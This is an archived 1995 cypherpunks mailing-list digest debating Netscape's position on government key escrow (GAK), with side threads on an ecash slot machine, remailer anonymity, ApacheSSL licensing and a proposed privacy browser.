> except with a short key length (e.g. 40 bit keys), and that will not be
> acceptable to corporate customers in other countries. They will create their
> own solution, and we will not be able to sell to a larger world market. In
> fact, we could even be ordered by our own government to establish a key
> escrow system for its use inside the US.
----------------------
	I believe that the central question at hand is whether Netscape will
incorporate mandatory GAK into any of its products if you have an economic
(governmental purchase) rather than physical (governmental threat of violence)
reason to do so. I would hope that the upcoming statement will clarify this
position, and in the proper direction.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 23:00:08 PST
To: Jeff Weinstein <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512040700.XAA14434@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:02 PM 12/2/95 -0800, Jeff Weinstein wrote:
> The whole point of our anti-GAK position is that
> government mandated key escrow is bad.

"Our" anti-GAK position.

I would like to hear Jim Clark say "GAK is bad".

I would also like to hear him, and you, refrain from using the phrase
"key escrow" and instead use the phrase "Government Access to Keys".

I draw your attention to the fact that Bill Gates did not use the 
intentionally misleading phrase "key escrow" in his book.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 23:00:23 PST
To: unicorn@schloss.li>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
Message-ID: <199512040700.XAA14483@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 AM 12/4/95 GMT, Dan Weinstein wrote:
>I see, you cannot say that they are really supporting GAK based upon
>the actual statements made, so you simply assert it.

You cannot say they oppose it either.  Jim Clark speaks about 
GAK using mostly pleasant sounding favorable words.

Let me hear him talk about GAK using plain words.



>Now given point B, I see no reason to expect that they would in the
>past have done much more than they have.  Given point C, I see they
>are currently expanding their lobbying. 

I do not see that they are currently expanding their lobbying:  Indeed
I do not see that they are currently lobbying.


>I sent a message to Netscape after reading the article that started
>this,  It simply stated that I wanted clarification on their position
>on GAK and that if they were to support it they would lose a loyal
>customer.  I have since been convinced by Jeff Weinstein's posts to
>this list that the company does not support GAK, and in fact they
>oppose it. 

I have been convinced that Jeff Weinstein opposes GAK

If his policy represents company policy then I hope to hear
a similar statement signed authoritatively.


I have not seen that yet.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 3 Dec 95 23:04:27 PST
To: "E. ALLEN SMITH" <jsw@netscape.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512040704.XAA17057@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> >   I don't believe that Netscape will ship a product that mandates GAK
> > unless it was required by law to do so.  As long as it is legal to sell
> > non-escrowed crypto products in this country or elsewhere, I think we
> > will keep doing it, because that is what our customers want.

E. ALLEN SMITH wrote:
	I am glad that your information leads you to this belief. However, I
> would still prefer that the official company statement include a clear section
> on this matter.

I also would like to hear this.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 95 15:23:33 PST
To: cypherpunks@toad.com
Subject: unwanted AIP mail?
Message-ID: <199512022323.AAA00288@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Anyone else suddenly start hearing from these folks?

>  Date: Fri, 1 Dec 95 14:44:34 EST
>  From: physnews@aip.org (AIP listserver)
>  Message-Id: <9512011944.AA12171@aip.org>
>  To: physnews-mailing@aip.org
>  Subject: update.250
>  X-UIDL: 817946091.001
>  
>  PHYSICS NEWS UPDATE                         
>  The American Institute of Physics Bulletin of Physics News
>  Number 250 December 1, 1995       by Phillip F. Schewe and Ben
>  Stein
>  
>  TWO-BIT QUANTUM LOGIC GATES have been experimentally {...}




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: traye@ix.netcom.com (David S McDaniel )
Date: Sun, 3 Dec 95 00:35:05 PST
To: cypherpunks@toad.com
Subject: Add to List
Message-ID: <199512030834.AAA06903@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I would like to be added to your mailing list for the cypherpunks.
Thank you very much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Sun, 3 Dec 95 04:26:29 PST
To: cypherpunks@toad.com
Subject: Re: prototype slot-machine
Message-ID: <m0tMDV8-002tsfC@shoga.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Sat, 2 Dec 1995, sameer wrote:
>
>> 	I've written up a slot-machine thing for ecash, very
>> experimental, very buggy, not very slick, (i'd like to get the
>> technical bugs worked out before i put a fancy wrapper on it) and i'd
>> *like* to announce it here for testing, but I'm worrying about
>> gambling laws.. 
>> 	any thoughts?
>>

On Sun 3 Dec 1995, Attilla wrote:

	sure, just put it up on a foreign server. bahamas, caymans, etc. 
>there are several gambling bits going on from what I read. I dont gamble 
>so I never noted any addresses down, but someone should remember or have 
>it in their archives.


Try this site: Offshore Infomation Services in Anguilla,
http://www.offshore.com.ai/


William Knowles
printing@explicit.com


...

//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\ 
  Graphically Explicit                     
  Printing - Advertising - Graphic Design  
  1555 Sherman Avenue - Suite 203          
  Evanston IL., 60201-4421                 
  800.570.0471 - printing@explicit.com
  Accept, Embrace, Adapt, Create     
\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//!\\!//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Hupp" <ahupp@primenet.com>
Date: Sun, 3 Dec 95 16:26:12 PST
To: cypherpunks@toad.com
Subject: Pegasus Mail PGP Extensions?
Message-ID: <199512040026.RAA02724@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know if there are any PGP extensions for WinPMail, and 
where to get them?

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQBtAzCNppQAAAEDALhWZl7IuGZ9zZT5bACo0b/1L0Nv0C72vKHIO3IHh+cwpHHa
2Ozb9aeO0UvXGwkkZIYgUm0EvmzKh7yb1GTLvBp5kXpR3I9w+Yj4LGlBDERpUWw6
x4ED49pwDnz1Hl5FBQAFEbQYYXNoIDxhaHVwcEBwcmltZW5ldC5jb20+
=PtJK
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 3 Dec 95 04:08:07 PST
To: cypherpunks@toad.com
Subject: Suggestion for CP browser
Message-ID: <9512031205.AA24992@all.net>
MIME-Version: 1.0
Content-Type: text


I think a CP browser is just the ticket to change the way the world works.
How about this:

	- CP writes a browser with PGP or better quality crypto.
	- CP makes it freely available to any individual
	- CP licenses it to corporations for $1 per copy
	- Funds produced go to support worthy causes, support a permanent
		home for CP, and support anti GAK efforts (lobying, etc.)

I think the CP browser should include an embedded language (not Java -
maybe a version of LISP) that does a far better job than Java of assuring
limitations on what programs can do.  It should also support faking the
source of a browser request (for privacy of the user), all forms of digital
cash, firewall-type forwarding, pseudonyms, and all of the other things that
CPs fight for.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 4 Dec 95 07:50:44 PST
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Info on Netscape's key escrow position
Message-ID: <199512041550.HAA16441@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


>James A. Donald wrote:
>> I would like to hear Jim Clark say "GAK is bad".

At 11:05 PM 12/3/95 -0800, Jeff Weinstein wrote:
> I do believe that the company, Netscape, will take such a position
> in the coming week.

I will be greatly relieved when this happens.

I would be even more relieved if Netscape were to take action
to make it more difficult for the government to introduce GAK.

> Did he take a position against GAK? 

He did both less than that and considerably more than that:

Instead of trying to persuade us that he was against GAK, he sought
to persuade the reader that the reader should be against GAK.  He
sought to make it difficult for both a future Microsoft and a future
government to introduce GAK.

He described GAK in accurate language, rather than euphemistic terms.

He did not editorialize "GAK is bad" but any reasonable person 
reading his book, unfamiliar with crypto and the controversy, 
would conclude from the facts that he presented that GAK is a 
radical violation of the fourth amendment -- He described GAK 
in neutral, factually accurate language that doubtless deeply
offended the folks at NSA.

> I've been trying to use either GAK, or "mandatory key escrow" 
> to refer to the hated beast. 

"Mandatory key escrow" is still an oxymoronic euphemism.

It is not escrow if the valuable item is held by someone who 
is party to the potential conflict, or subject to the power 
of someone who is party to the potential conflict.

Even to those of us who know what the euphemism "mandatory key
escrow" stands for, it still does not sound nearly as
threatening and scary as "government access to keys".
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 4 Dec 95 08:02:37 PST
To: John Young <cypherpunks@toad.com
Subject: Re: GAK_hit
Message-ID: <199512041603.IAA22793@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:25 AM 12/4/95 -0500, John Young wrote:
>   12-4-95. W$Jabber:
>
>   "Microsoft Probe Spurs Subpoenas Tied to Internet.
>   Antitrust Effort Appears Focused on Windows 95 Disabled
>   Rival Software."

>      The subpoena issued to Netscape may be of particular
>      significance. In the estimate of Netscape and industry
>      observers,


I regularly use netscape on windows 95, and I conclude that 
this subpoena is pure, 100% harassment.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Sun, 3 Dec 95 06:10:26 PST
To: solman@MIT.EDU
Subject: Re: Cypher secure versus computationally unbounded adversary
In-Reply-To: <9512021931.AA01944@ua.MIT.EDU>
Message-ID: <95Dec3.091041edt.1000@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Hi all,
> 
> I've just come up with a method for implementing and encryption algorithm
> that is absolutely secure from passive attacks by a computationally
> unbounded adversary. Is this a new capability, or am I reinventing the
> wheel here?
> 
> Thanks,
> 
> Jason W. Solinsky

That is certainly new.  Infact, I think there are proofs that say you 
can't do it.  I'm positive you can't do it if the plaintext does not
have maximum entropy.  So, tell us your scheme.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 3 Dec 95 06:35:25 PST
To: William Knowles <printing@explicit.com>
Subject: Re: prototype slot-machine
In-Reply-To: <m0tMDV8-002tsfC@shoga.wwa.com>
Message-ID: <Pine.3.89.9512030904.A26226-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain



> On Sun 3 Dec 1995, Attilla wrote:
> 
> 	sure, just put it up on a foreign server. bahamas, caymans, etc. 
> >there are several gambling bits going on from what I read. I dont gamble 
> >so I never noted any addresses down, but someone should remember or have 
> >it in their archives.

Or check out a whole slew of other gambling ventures at 
<http://www.casino.org>
They were in on the ecash trial, I think.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 95 09:56:46 PST
To: printing@explicit.com (William Knowles)
Subject: Re: prototype slot-machine
In-Reply-To: <m0tMDV8-002tsfC@shoga.wwa.com>
Message-ID: <199512031751.JAA01922@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Try this site: Offshore Infomation Services in Anguilla,
> http://www.offshore.com.ai/

Hey, fancy that, even though gambling is illegal in California you're
saying that on a site two feet from my desk it's legal?

	cool.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 3 Dec 95 08:37:10 PST
To: cypherpunks@toad.com
Subject: Re: ANNOUNCEMENT: ALICE'S ADDRESS REVEALED.
In-Reply-To: <199512030524.VAA24279@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951203113046.13147B-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> As I promised, I've now opened a channel so that anyone who wants to
> can send Alice de 'nonymous email.  I can now be reached via
> an455120@anon.penet.fi.  Mail sent to Alice de 'nonymous at that
> address will get to me, and I will do my best to reply to you as well,
> but I can't guarantee, anything.

I don't think that was a smart thing to do. Your real email is now 
registered in some database in Finland - how difficult would it be to 
retrieve it? From what I remember organizations like Scientology had no 
problem getting real emails from anon.penet.fi when they reported that 
anXXXXXX was causing trouble... couldn't the same be done for your account?
If that single system becomes compromised one day all the accounts could be 
posted on some web page somewhere and it would be a simple matter of 
looking you up! Signing your message with PGP and using Mixmaster would 
give yourself an identity while still keeping you anonymous.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sun, 3 Dec 95 08:41:30 PST
To: sameer <sameer@c2.org>
Subject: Re: your mail
In-Reply-To: <199512030732.XAA23416@infinity.c2.org>
Message-ID: <Pine.LNX.3.91.951203113858.13147C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> > Competing with Netscape is obviously something that's easier said than
> > done.  But we ought to consider the strategic importance of having robust,
> 
> 	I hate to repeat myself, but sometimes people don't listen.
> http://www.c2.org/apachessl/

I don't see how you can charge for a commercial versions of ApacheSSL. 
Isn't it protected by the GNU license agreement? Or is the idea that by 
registering ApacheSSL you still get the software for free but you are 
required to pay for support.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 3 Dec 95 03:54:09 PST
To: sameer <sameer@c2.org>
Subject: Re: prototype slot-machine
In-Reply-To: <199512030623.WAA17815@infinity.c2.org>
Message-ID: <Pine.BSD.3.91.951203115214.25684B@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, sameer wrote:

> 	I've written up a slot-machine thing for ecash, very
> experimental, very buggy, not very slick, (i'd like to get the
> technical bugs worked out before i put a fancy wrapper on it) and i'd
> *like* to announce it here for testing, but I'm worrying about
> gambling laws.. 
> 	any thoughts?
>
	sure, just put it up on a foreign server. bahamas, caymans, etc. 
there are several gambling bits going on from what I read. I dont gamble 
so I never noted any addresses down, but someone should remember or have 
it in their archives.

> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sun, 3 Dec 95 08:55:00 PST
To: fc@all.net
Subject: Re: Suggestion for CP browser
Message-ID: <199512031655.QAA25843@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 3 Dec 1995 07:05:06 -0500 (EST) you wrote:

>I think a CP browser is just the ticket to change the way the world works.
>How about this:
[snip]
>	- Funds produced go to support worthy causes, support a permanent
>		home for CP, and support anti GAK efforts (lobying, etc.)

A while back it was mentioned here that Eric Hughes set up Cypherpunk
Labs, Inc, and it was supposed to provide scholarships to
crypto-minded students and offer computational resources for those
late-night factoring sessions.  Did anything ever happen with that?  I
could use a scholarship about now...;)

>
>I think the CP browser should include an embedded language (not Java -
>maybe a version of LISP) that does a far better job than Java of assuring
>limitations on what programs can do.  It should also support faking the

I think Java is going to become a standard to run with.  It's pretty
close to C, so it isn't hard to pick up and it performs acceptibly. 
While I don't mind coding in LISP or Scheme, I think most programmers
in the trenches would rather fight than recurse.
						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 3 Dec 95 10:58:01 PST
To: cypherpunks@toad.com
Subject: Do the Right Thing
Message-ID: <ace725d322021004ccbf@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



My thesis is that both Netscape and Microsoft are in positions at this time
to either do the right thing (tm) or to help build in the tools for a
police state, an Orwellian surveillance state.

Netscape, being the dominant browser company, and Microsoft, being the
dominant OS company, are in special positions to "build in Big Brother."
I'm not claiming they are, just that they are clearly in a position to make
it technologically more feasible to make non-GAK illegal. They both need to
carefully think about the role that's been "given" to them (whether by
fortune, hard work, or being in the right place at the right time) and do
what's right.

Strong words, perhaps, but the implications of mandatory key escrow are
quite clear. We debated these points for a long time during the Clipper
debate, and later when "Software Key Escrow" began to rear its head. I
won't repeat these arguments against GAK here, but will take this
opportunity to quote from a new book that actually quotes my words:

"May, ever the idea juggler, also weighed in with some powerful arguments
_for_ PGP that appealed to a stodgy old Democrat (small "d" as well) like
me. Even the Feds should have grasped them. "Could strong crypto be used
for sick and disgusting and dangerous purposes?" May asked. And then he
answered himself: "So can locked doors, but we don't insist on an 'open
door policy' (outside of certain quaint sorority and rooming houses!). So
do many forms of privacy allow plotters, molesters, racists, etc. to meet
and plot." Whatever May was, anarchist, libertarian, objectivist, or
nothing, he was making more sense in those three sentences than Baker could
have in a 1,000 essays."

[David H. Rothman, "NetWorld! What People are Really Doing on the Internet,
and What it Means to You," Prima Publishing, 1996. Note: I don't recall
meeting Rothman, and didn't know about this book until I stumbled across it
last night in a bookstore.]

It is important that such companies as Netscape and Microsoft fully
understand that crypto policy will largely determine civil liberties in
this country and other countries for a long time to come. And they must
understand that they can influence the direction. Bill Gates, after some
early waffling, seems to now fully understand the implications of GAK and
has written persuasively against it. Jim Clark does not seem to me have
thought about it as deeply, or perhaps has views of civil liberties which
are not at odds with mandatory key escrow, the "open door policy" mentioned
above.

And time is of the essence. Things move very fast. It is no longer the case
that a law is passed, then companies respond to the new legal regime with
their own policies and products. Companies, especially in high tech, are
"partners" from the start, as we saw with the Clipper development (where
AT&T had known about Clipper for years prior to the first public
announcement, and was cooperating in the development of it, not to mention
the other companies such as Mykotronx, VLSI Technology, etc., which were
involved in secret for years).

It is only sheer speculation on our part (some of us, at least) that
negotiations about GAK have been going on with the major software
companies. Jim Clark, for example, learned what he knows about key escrow
_someplace_, and it probably wasn't from our list or from articles he'd
read. I'm betting, but could of course be wrong, that he and other folks at
Netscape (and I mustn't leave out Microsoft, Sun, SGI, Apple, etc.) have
been briefed on key escrow and that various negotiations are already
underway. This would match how things were done with Clipper, and would
explain Clark's voiced support for the need for GAK.

I hope Jeff W. and Jim C. can have some _long_ chats. The stakes are too
high for product decisions to be made without full awareness of the
implications. The statements from Jim Clark do tend to imply a kind of
defeatism, and even Jeff's comments seemed laden with qualifications about
"only if the government requires us to." As Hal Finney noted in his post,
it's as if the Netscape people are preparing for the inevitable. Maybe it's
not an indication that GAK is being considered within Netscape, but maybe
it is. After all, one rarely hears "only if we have to" qualifications on
things that are truly from out in left field.

And what Netscape agrees to put in future releases of its browsers or its
servers could have dramatic effects on the whole climate.

(A side point, somewhat abstract: The dominance of Netscape, rising from
nowhere to becoming the major player in this debate, illustrates a point
about "monocultures" and their ecological effects. If yellow corn is good,
replace other strains of corn with yellow corn. Pretty soon, the world's
corn output is 96% yellow corn. Some ecological downsides to this. In this
case, Netscape is becoming the yellow corn of the Web, and an obvious
"choke point" for the NSA and its sisters to mandate crypto policies.
Hence, the role of non-yellow-corn alternatives...)

Should Netscape play ball with the NSA or refuse to cooperate? I'm not
suggesting that Netscape "break the law." Actually, there are *no* laws at
present about GAK or about the use of strong crypto within the U.S., and
most of us want to keep it that way. Thus, Jim Clark and Netscape could
strongly lobby for keeping things the way they are, and could even say "If
foreign governments demand GAK, let them build it in themselves--we will
not produce the software to run a police state."

And if export laws demand GAK in exported products, Netscape should "do the
right thing" and have two versions. It may add to their costs a little, but
it's better than building in the machinery for a GAK law to later be
passed.

(Explain something to me. I have never, ever understood why it is a concern
of the U.S. government that we help build in GAK for foreign governments,
that we make sure that products intended for export to France or Syria have
GAK that allows those governments to read the traffic of their citizens.
And if the concern is that exported versions of software must be readable
to the _United States_, then this is a non-starter in terms of sales in
many or even most foreign countries! I'm sure France will welcome with open
arms a version of Netscape that allows the NSA to read the traffic of
French citizens. Oh, by the way, what legal jurisdictions will be involved
in obtaining the escrowed keys of foreigners? The answers are both clear
and murky, if you catch my drift.)

If the U.S. insists on GAK _within the U.S._, as many of us fear is the
long-term danger, then all bets are off anyway. But I would hope that
Netscape does nothing to make it _easier_ to make this the case!

A viable thing for Netscape to do is to announce forthrightly that it will
separate the issue of export from what it sells in the U.S., that there
will be NO GAK included in any U.S.-sold packages. The quest for an "all
world" version, freely exportable, should not take precedence over the
civil liberties issues. And I predict that any slight losses in market
share or slight increases in product cost will be _less_ than the effects
Netscape will see if their product comes to be associated with "Big Brother
Inside."

Enough for now.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 3 Dec 95 09:53:06 PST
To: cypherpunks@toad.com
Subject: Transatlantic Agenda
Message-ID: <199512031752.MAA29656@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


If anyone knows where to get a copy of this document -- 
especially those surely secret concordances that address the 
agenda of this list -- please whistle:


	 MADRID, Dec 3 (Reuter) - U.S. President Bill Clinton and 
European Union leaders signed on Sunday a so-called New 
Transatlantic Agenda intended as a blueprint for Euro-American 
relations into the 21st century.  

	 The document encompasses cooperation on trade, security, 
human rights, aid, democracy, health care and crime-fighting 
among other subjects.  








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sun, 3 Dec 95 10:02:21 PST
To: cypherpunks@toad.com
Subject: Code to detect netscape & send a message (was Re: Barring access to Netscape)
In-Reply-To: <199512010917.DAA28429@snoopy.vetmed.auburn.edu>
Message-ID: <NAA07447.199512031802@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <199512010917.DAA28429@snoopy.vetmed.auburn.edu>, Frank Stuart write
s:
[...client-pull...]
>After talking to a couple of people, and playing around some, this seems
>to be a better choice.  That way, you can actually send information (including
>a list of where to get other browsers) instead of just garbage to netscape
>users.  Is anyone aware of browsers other than Netscape that do client pulls?

There is at least one.  However if you can have server-side includes, check
out: http://www.va.pubnix.com/staff/stripes/nstest.shtml

There is sample source for a netscape tester, and an example of it.

If you can't do server side includes, try this (code not written):

Add the client pull META tag to all your documents, have the client
pull "/cgi-bin/bad-mozilla-no-mozilla-biscut".  That script should
check the browser type (so it can avoid anoying users of the few
non-Mozilla browsers that do client-pull).  Remember that a browser
type of "Mozilla/1.22 (compatible; MSIE 2.0B; Windows 95)" (or similiar)
is *not* netscape.  If the browser type indicates a browser type you
don't want to anoy you can just re-send the document that the PATH_TRANSLATED
env. variable points to.  If the browser type indicates a netscape product,
then you can take your choice of actions:

 * Prepend 
   "<A HREF="explain_gaK.html>netscape supports GAK, and that's bad</A>"
   to the document (you need to do slightly more then that - since you
   need to emit the normat document up to <BODY>, then your text, then
   the origanal document again, so you might go for the next option)
 * Append
   "<A HREF="explain_gaK.html>netscape supports GAK, and that's bad</A>"
   to the tail of the document (this works fine unless you have a
   </HTML> at the end - which almost nobody has).
 * Only give the "netscape sucks" message.  I don't think this is a good 
   idea since it it easyer to hammer your point across if people keep
   seeing the message then if they can't see your page, and decide to go
   elsewhere.

[...]
>That's not a bad idea either.  Hopefully, Netscape will post a retraction
>(soon!) and none of this will be necessary.

Indeed, I hope so.  Even if the retraction is formed internally by people
going "Jim, this is going to put us at odds with the people who put up
content, and gennerate bad press.  It might be a better idea to try to
stand up agenst GAK then go with it.".  (and for the record, yes I do think
there is a signifigant chance that the whole GAK thing is a mis-interpration).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Sun, 3 Dec 95 11:02:22 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: toy story: more power
Message-ID: <01HYDG3GEDJM94E9C0@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

obcrypto: i'd like to see how bruter.c would have run on their
'renderfarm'.

MOUNTAIN VIEW, CALIF. (Nov. 30) BUSINESS WIRE -Nov. 30, 1995--The
making of "Toy Story," the stunning new movie from Walt Disney
Pictures that is the world's first full-length completely
computer-generated animated film, involved the use of more than 100
high-powered computers from Sun Microsystems -- which together
comprised one of the most powerful graphics rendering engines ever
created.  

=snip=

For the movie, Pixar created a networked bank or "cluster" of 117
Sun(TM) SPARCstation(TM) 20 workstations -- each containing at least
two  microprocessors, and running on Sun's Solaris(TM) operating
environment -- to handle the critical task of "rendering" each of the
114,000 frames in the 77-minute movie.  

=snip=

Sun worked closely with a team from Pixar to create its RenderFarm,
which serves as Pixar's central resource of computer processing
power.  The RenderFarm uses a network computing architecture in which
a powerful  SPARCserver(TM) 1000 acting as a "texture server"
supplies the necessary data to the many rendering client workstations
needed to complete the rendering process.  

The RenderFarm was assembled by Sun and Pixar engineers in less than a
month and drew upon Sun's own experience in setting up "farms" of
many systems linked together.  Some facts about Pixar's RenderFarm
and the computing aspects of "Toy Story": -0-  

  
   -- The RenderFarm is one of the most powerful rendering engines  
ever assembled, comprising 87 dual-processor and 30 four-processor  
SPARCstation 20s and an 8-processor SPARCserver 1000.  The RenderFarm 
has the aggregate performance of 16 billion instructions per second --
its total of 300 processors represents the equivalent of approximately
300 Cray 1 supercomputers.  
  
   -- Each system is the size of a pizza box, and all 117 systems  
work in a footprint measuring just 19 inches deep by 14 feet long by 8
feet high.  
  
   -- Sun is the price/performance leader, in Pixar's own rankings.  
The SPARCstation 20 HS14MP earned a rating of $80 per Rendermark (a  
Pixar measurement for rendering performance), while the comparable SGI
Indigo Extreme came in at approximately $150 per Rendermark.  
  
   -- Using one single-processor computer to render "Toy Story" would 
have taken 43 years of nonstop performance.  
  
   -- Each of the movie's more than 1,500 shots and 114,000 frames  
were rendered on the RenderFarm, a task that took 800,000 computer  
hours to produce the final cut.  Each frame used up 300 megabytes of 
data -- the capacity of a good-sized PC hard disk -- and required from
two to 13 hours for final processing.  
  
   -- In addition to the high-resolution final rendering, the  
RenderFarm was also used to generate the test images animators needed 
to plan and evaluate lighting, texture mapping and animation.  Since 
fast response is key in doing tests, RenderMan could produce test  
frames in as little as a few seconds.  
  
   -- Scalability is built-in:  the RenderFarm can be upgraded  (with
more processors and disk storage) to a nearly four-fold  performance
level, without requiring any additional space.  The  RenderFarm also
integrates seamlessly with Pixar's existing computer  network
containing different types of machines.  

=snip=





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 3 Dec 95 12:21:29 PST
To: cypherpunks@toad.com
Subject: Re: Jim Clark, "Mr. Bubble"
In-Reply-To: <199512031807.TAA07090@utopia.hacktic.nl>
Message-ID: <199512032022.OAA02418@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> >I don't expect Netscape, as a corporate citizen, to engage in civil
> >disobedience.  But I hope that Netscape will take seriously its obligation
> >to protect the rights of citizens. 
> 
>       I do. I regard the capacity to do so as crucial, and I regard the
> fact that you *don't* expect them to as very telling. As has been pointed
> out extensively, the chances that he'll manage to hang on to his
> soft-earned cash until he can sell out are a long shot--unless he takes a
> stand against GAK. 

I don't know much about the market.  I can't say whether or not the market
will continue to value Netscape at $5 billion -- I never believed it would
happen in the first place.  If I walked outside and saw the skies filled
with pigs, and then you asked me when pigs will stop flying, I'd have to
say, "I don't know."  It's a lot easier to answer, "when will pigs fly?"
than, "when will pigs stop flying?"

It seems likely to me that the bubble's going to pop one way or another,
but again, I don't really know what I'm talking about. 

But I don't think Netscape can approach their business that way anyway. 
The market is going to do what it wants, and all they can do is try to
sell browsers and servers. 

> Governmental policy on the subject of crypto has relied
